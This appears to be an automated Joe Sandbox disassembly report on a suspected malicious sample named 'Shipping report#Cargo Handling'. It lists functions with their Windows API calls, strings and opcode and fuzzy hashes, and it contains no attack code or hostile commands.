Opcode ID: 14aadf94da5d2340d5374f1e551627b122409314b3da0ff17d88ba8ea225da07
Instruction ID: 05bb47083885c82c705950eed93fe130df6e1837fb742abb44b53bfec3233ba8
Opcode Fuzzy Hash: 14aadf94da5d2340d5374f1e551627b122409314b3da0ff17d88ba8ea225da07
Instruction Fuzzy Hash: 0251C6E16447D93DFB364224CC55BBA7EE96B47300F088588E2DA46CC3D294EC98F752

Function 000C542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(000D3CD6,?,?,?,?,?,?,?,?,000C5BA3,?,?,000D3CD6,?,?), ref: 000C5470
__fassign.LIBCMT ref: 000C54EB
__fassign.LIBCMT ref: 000C5506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,000D3CD6,00000005,00000000,00000000), ref: 000C552C
WriteFile.KERNEL32(?,000D3CD6,00000000,000C5BA3,00000000,?,?,?,?,?,?,?,?,?,000C5BA3,?), ref: 000C554B
WriteFile.KERNEL32(?,?,00000001,000C5BA3,00000000,?,?,?,?,?,?,?,?,?,000C5BA3,?), ref: 000C5584

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: fe890dff93926e298d4bb6e5208624e2eaad4b649a6975676face1319da57e8a
Instruction ID: 15fe75d4eac10b61be676c4ae8d11dec7e63de77544ed00a9c8577f36cb442fa
Opcode Fuzzy Hash: fe890dff93926e298d4bb6e5208624e2eaad4b649a6975676face1319da57e8a
Instruction Fuzzy Hash: 9151AD74A00A08AFDB20CFA8DC55FEEBBF9EB08301F14415EE555E7291D670AA81CB60

Function 000B2D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 000B2D4B
___except_validate_context_record.LIBVCRUNTIME ref: 000B2D53
_ValidateLocalCookies.LIBCMT ref: 000B2DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 000B2E0C
_ValidateLocalCookies.LIBCMT ref: 000B2E61

Strings

csm, xrefs: 000B2DF6

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 4d5ca3494c9255bc0e5bf3ddb639c58c9f6853a684877ea8a617054ba4e959eb
Instruction ID: 49fa50b2c9bee2d49302db1748009567c7ad53af9095e1257d9b5e0e9d499296
Opcode Fuzzy Hash: 4d5ca3494c9255bc0e5bf3ddb639c58c9f6853a684877ea8a617054ba4e959eb
Instruction Fuzzy Hash: 89419E34A00209ABCF10DF68C895ADEBBF5FF44324F148165E814AB392DB31EA45CBD1

Function 001110B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0011304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0011307A
Part of subcall function 0011304E: _wcslen.LIBCMT ref: 0011309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00111112
WSAGetLastError.WSOCK32 ref: 00111121
WSAGetLastError.WSOCK32 ref: 001111C9
closesocket.WSOCK32(00000000), ref: 001111F9

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: d4940ae2b82fe01735e9d285a30b7d8cd248c4356eda7d69b16072fa1a3e4847
Instruction ID: dd5fee9db1b0f1598bac439d51a2fc596729eb8e6c7089c47f1dec4605456533
Opcode Fuzzy Hash: d4940ae2b82fe01735e9d285a30b7d8cd248c4356eda7d69b16072fa1a3e4847
Instruction Fuzzy Hash: CB41C331600604BFDB249F24C884BE9F7EAEF45324F148069FE199B292D770AD81CBE1

Function 000FCF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 000FDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,000FCF22,?), ref: 000FDDFD

Part of subcall function 000FDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,000FCF22,?), ref: 000FDE16

lstrcmpiW.KERNEL32(?,?), ref: 000FCF45
MoveFileW.KERNEL32(?,?), ref: 000FCF7F
_wcslen.LIBCMT ref: 000FD005
_wcslen.LIBCMT ref: 000FD01B
SHFileOperationW.SHELL32(?), ref: 000FD061

Strings

\*.*, xrefs: 000FCFF3

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 6fb57c57c7406b7b661412795550ffa2493b77a8d630657450de2a6027049079
Instruction ID: 68a8920a628d525ec876efcae5292b65d431fd6cc8b5fbdfc098605fde78de6d
Opcode Fuzzy Hash: 6fb57c57c7406b7b661412795550ffa2493b77a8d630657450de2a6027049079
Instruction Fuzzy Hash: 4741587190521C5EDF52EBA4C982EEDB7F9AF04340F0000E6E605EB552EA34A748DB50

Function 00122DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00122E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 00122E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 00122E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00122EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00122EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 00122EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00122F0B

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 0f835f5c3595f64bc339d76a79676e67c428fab85ebda46c338d6346a3defa8e
Instruction ID: 5c2a12c5fb68dc0b1ed8a9e56f62498fd7fbcbfae51c1eed9baad33aa4002721
Opcode Fuzzy Hash: 0f835f5c3595f64bc339d76a79676e67c428fab85ebda46c338d6346a3defa8e
Instruction Fuzzy Hash: D2310530604160BFDB21CF58EC84FA937E1EB5A714F1A4164FA108F6B1CBB1A8A1EF41

Function 000F7726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000F7769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000F778F
SysAllocString.OLEAUT32(00000000), ref: 000F7792
SysAllocString.OLEAUT32(?), ref: 000F77B0
SysFreeString.OLEAUT32(?), ref: 000F77B9
StringFromGUID2.OLE32(?,?,00000028), ref: 000F77DE
SysAllocString.OLEAUT32(?), ref: 000F77EC

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: a5b4e822d88424686c69def61208333f14fee616e5ceecd3bf91bb214982870a
Instruction ID: fef6f605da6c863d2720253fb1242eb616f0667789e6f0ffa5f319f9ad8b5ca1
Opcode Fuzzy Hash: a5b4e822d88424686c69def61208333f14fee616e5ceecd3bf91bb214982870a
Instruction Fuzzy Hash: A5219176608219BFDB20EFA8CC84CBF73ECEB093647108025FA08DB551D6709C419BA1

Function 000F77FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000F7842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000F7868
SysAllocString.OLEAUT32(00000000), ref: 000F786B
SysAllocString.OLEAUT32 ref: 000F788C
SysFreeString.OLEAUT32 ref: 000F7895
StringFromGUID2.OLE32(?,?,00000028), ref: 000F78AF
SysAllocString.OLEAUT32(?), ref: 000F78BD

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 90cb787e2391a85968117321f33484e77aa62bfc038ddafff2caac03fba58701
Instruction ID: c35ce00781265d042a14bad2921f49d82e1438f09693245ae39dd49a438b5785
Opcode Fuzzy Hash: 90cb787e2391a85968117321f33484e77aa62bfc038ddafff2caac03fba58701
Instruction Fuzzy Hash: 23215331604108BF9B20ABA8DC89DBA77ECEB097607108125FA15CB5A1DA70DC42DB65

Function 001004D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 001004F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0010052E

Strings

nul, xrefs: 00100567

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: ec8ea10f9077a7f20944b8d2b0f1ead8d9275ec98fd9fcc3b6d64e320c64cea9
Instruction ID: 2b0196cbb58ffb03b0db5920f989fc67ebb2d740ab7294231c2e9a6eb7f4e492
Opcode Fuzzy Hash: ec8ea10f9077a7f20944b8d2b0f1ead8d9275ec98fd9fcc3b6d64e320c64cea9
Instruction Fuzzy Hash: 5E216871500305EFDB219F29DC04B9A7BB4BF49724F204A29E9E1D62E0D7B09991CF60

Function 001005A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 001005C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00100601

Strings

nul, xrefs: 00100639

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 5c4bf17cdf28ceeaeae622f9888247d33c1871bacca939434d273438409c3541
Instruction ID: d23f1abc1ce5774489f147b5f3e1c82301d9f021fb3994ec6a03f3b6f127c7bf
Opcode Fuzzy Hash: 5c4bf17cdf28ceeaeae622f9888247d33c1871bacca939434d273438409c3541
Instruction Fuzzy Hash: DF219F35500305EFDB219F689C04B9A77A5BF99720F200A19E9E1E72E0EBB199A1CB50

Function 001240AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0009600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0009604C
Part of subcall function 0009600E: GetStockObject.GDI32(00000011), ref: 00096060
Part of subcall function 0009600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0009606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00124112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0012411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0012412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00124139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00124145

Strings

Msctls_Progress32, xrefs: 001240E3

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 7fc653021258a1b79d98621c751df051fa07aa27ce356aa875791a221ab41af5
Instruction ID: 5dd37ae20296e67c9d236caf4992dd2fa5c022d11af8905ea0cfc68175382e94
Opcode Fuzzy Hash: 7fc653021258a1b79d98621c751df051fa07aa27ce356aa875791a221ab41af5
Instruction Fuzzy Hash: 9C1190B2140229BFEF219F64DC86EE77F5DEF08798F014110FA18A6190CB729C61DBA4

Function 000CD7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000CD7A3: _free.LIBCMT ref: 000CD7CC

_free.LIBCMT ref: 000CD82D

Part of subcall function 000C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,000CD7D1,00000000,00000000,00000000,00000000,?,000CD7F8,00000000,00000007,00000000,?,000CDBF5,00000000), ref: 000C29DE
Part of subcall function 000C29C8: GetLastError.KERNEL32(00000000,?,000CD7D1,00000000,00000000,00000000,00000000,?,000CD7F8,00000000,00000007,00000000,?,000CDBF5,00000000,00000000), ref: 000C29F0

_free.LIBCMT ref: 000CD838
_free.LIBCMT ref: 000CD843
_free.LIBCMT ref: 000CD897
_free.LIBCMT ref: 000CD8A2
_free.LIBCMT ref: 000CD8AD
_free.LIBCMT ref: 000CD8B8

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: 03236a53786841b20c6452c9a145a4531de6130129b934e6ece6c1f57ec6fb64
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: 90111971944B04AADA21BFB0CC47FCF7BDCEF04700F40592EB29DA6893EA75B5059660

Function 000FDA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 000FDA74
LoadStringW.USER32(00000000), ref: 000FDA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 000FDA91
LoadStringW.USER32(00000000), ref: 000FDA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 000FDADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 000FDAB9

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: f5cd76f764b17b7d361887b5a8d2f2038312af89f6e9bdabe47ba555921b97c2
Instruction ID: c8295a2cc5de04ac4292d4720a2a936aad93603c5151434781cba078c3efebee
Opcode Fuzzy Hash: f5cd76f764b17b7d361887b5a8d2f2038312af89f6e9bdabe47ba555921b97c2
Instruction Fuzzy Hash: 530162F6500208BFE7609BA0DD89EFB336CEB08301F400492B706E2541E6749E958FB5

Function 0010096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(00C60670,00C60670), ref: 0010097B
EnterCriticalSection.KERNEL32(00C60650,00000000), ref: 0010098D
TerminateThread.KERNEL32(0047002D,000001F6), ref: 0010099B
WaitForSingleObject.KERNEL32(0047002D,000003E8), ref: 001009A9
CloseHandle.KERNEL32(0047002D), ref: 001009B8
InterlockedExchange.KERNEL32(00C60670,000001F6), ref: 001009C8
LeaveCriticalSection.KERNEL32(00C60650), ref: 001009CF

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: f6cb0139aa479f862ce321fe2c96fc118221e092791e97eef132b17ca5320d42
Instruction ID: 985a115e6e2867c325f1a5d54396a7ee190a6578b8441c46d82b34c9b58a752b
Opcode Fuzzy Hash: f6cb0139aa479f862ce321fe2c96fc118221e092791e97eef132b17ca5320d42
Instruction Fuzzy Hash: FFF0CD31442912FFD7665B94EE89BDA7A25BF05706F501015F20150CA5CB7594B6CFD0

Function 00095D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00095D30
GetWindowRect.USER32(?,?), ref: 00095D71
ScreenToClient.USER32(?,?), ref: 00095D99
GetClientRect.USER32(?,?), ref: 00095ED7
GetWindowRect.USER32(?,?), ref: 00095EF8

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 3864faecb7543fdd8103970bbf3b54b1a84b04348e3cdb7806bae81d50644378
Instruction ID: 4f66837654b692094f797af698868b71cbd185c8ba1b45c67f10672fe1588695
Opcode Fuzzy Hash: 3864faecb7543fdd8103970bbf3b54b1a84b04348e3cdb7806bae81d50644378
Instruction Fuzzy Hash: 0AB15C35A0074ADBDF24CFAAC8406EEB7F1FF58311F14841AE8A9D7250DB34AA51EB54

Function 000C01B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 000C00BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000C00D6
__allrem.LIBCMT ref: 000C00ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000C010B
__allrem.LIBCMT ref: 000C0122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000C0140

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
Instruction ID: e6054d5bde61777a6e2e7cc33407a301042d1cb0a3d75c9b5df719e6e18c14b2
Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
Instruction Fuzzy Hash: AA819072A00B06ABE7249F68CC42FEEB3E9AF41764F25453EF551D7682E771D9008750

Function 00111D10 Relevance: 9.3, APIs: 6, Instructions: 254networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00113149: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,0011101C,00000000,?,?,00000000), ref: 00113195

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00111DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00111DE1
WSAGetLastError.WSOCK32 ref: 00111DF2
inet_ntoa.WSOCK32(?), ref: 00111E8C
htons.WSOCK32(?,?,?,?,?), ref: 00111EDB
_strlen.LIBCMT ref: 00111F35

Part of subcall function 000F39E8: _strlen.LIBCMT ref: 000F39F2

Part of subcall function 00096D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,000ACF58,?,?,?), ref: 00096DBA
Part of subcall function 00096D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,000ACF58,?,?,?), ref: 00096DED

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

